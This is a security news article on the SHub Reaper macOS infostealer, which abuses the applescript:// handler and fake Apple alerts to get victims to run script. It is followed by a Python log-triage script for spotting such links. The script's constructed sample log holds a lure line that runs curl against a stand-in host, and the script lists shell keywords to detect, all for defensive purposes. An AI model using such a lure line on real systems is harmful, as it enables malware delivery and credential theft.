
SHub Reaper impersonates Apple, Google, and Microsoft in one macOS attack chain

Reaper changes tactics by moving execution into Apple’s Script Editor, sidestepping the protections Apple recently introduced to curb Terminal-based attacks. The end goal, however, remains credential theft, wallet compromise, and persistent access.

“The SHub Reaper variant represents a noteworthy evolution in macOS infostealers by shifting away from standard social engineering tactics that require victims to manually paste commands into the Terminal,” said Jason Soroko, senior fellow at Sectigo. “This approach lowers the technical barrier for infection and demonstrates a strategic pivot toward abusing native application handlers rather than relying purely on user error.”

Fake Apple updates run hidden AppleScript

The attack starts with users lured to malicious websites that display fake Apple security alerts. The pages then launch a ClickFix workflow, instructing the user to apply a supposed fix through Script Editor rather than through the Terminal.

Rather than getting the user to copy and paste shell commands, as earlier variants did, Reaper now abuses the applescript:// URI handler to pre-populate malicious AppleScript inside Script Editor. The victim is then socially engineered, through the ClickFix lure, into running the script themselves.
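A triage check for the lure described above, added here as an example and not taken from the article or any vendor tool: it pulls applescript:// links out of constructed proxy-log lines, decodes the script body such a link would pre-populate into Script Editor, and flags content that reaches for the shell. It assumes the handler carries the script in a query parameter named `script`; the log format, timestamps and hostnames are constructed.

```python
"""Triage applescript:// links seen in web/proxy logs (added example)."""
import re
from urllib.parse import parse_qs, urlsplit

# Keywords that, in a script a web page hands to a user, warrant a closer look.
SUSPICIOUS = ("do shell script", "curl", "osascript", "base64", "chmod")

# An applescript:// URL runs until whitespace or a quote/bracket in the log line.
URL_RE = re.compile(r"applescript://[^\s\"'<>]+", re.IGNORECASE)

# Constructed log lines in the shape of a proxy / browser-history export.
SAMPLE_LOG = [
    "2024-05-01T10:00:01Z GET https://update-check.example.invalid/alert.html",
    "2024-05-01T10:00:03Z CLICK applescript://com.apple.scripteditor?action=new"
    "&script=do%20shell%20script%20%22curl%20-s%20https%3A%2F%2F"
    "update-check.example.invalid%2Ffix%22",
    "2024-05-01T10:05:00Z CLICK applescript://com.apple.scripteditor?action=new"
    "&script=display%20dialog%20%22hello%22",
]


def decode_applescript_url(url):
    """Return the percent-decoded script carried in the URL's query string,
    assuming a 'script' parameter (hypothetical name); '' if none."""
    parts = urlsplit(url)
    if parts.scheme.lower() != "applescript":
        return ""
    # parse_qs already percent-decodes the value.
    return parse_qs(parts.query).get("script", [""])[0]


def triage_log(lines):
    """Return (line_no, decoded_script, keyword_hits) for every log line
    that carries an applescript:// URL, in log order."""
    findings = []
    for n, line in enumerate(lines, 1):
        for url in URL_RE.findall(line):
            script = decode_applescript_url(url)
            hits = [k for k in SUSPICIOUS if k in script.lower()]
            findings.append((n, script, hits))
    return findings


if __name__ == "__main__":
    for n, script, hits in triage_log(SAMPLE_LOG):
        verdict = "FLAG" if hits else "info"
        print(f"line {n} [{verdict}] hits={hits}: {script}")
```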
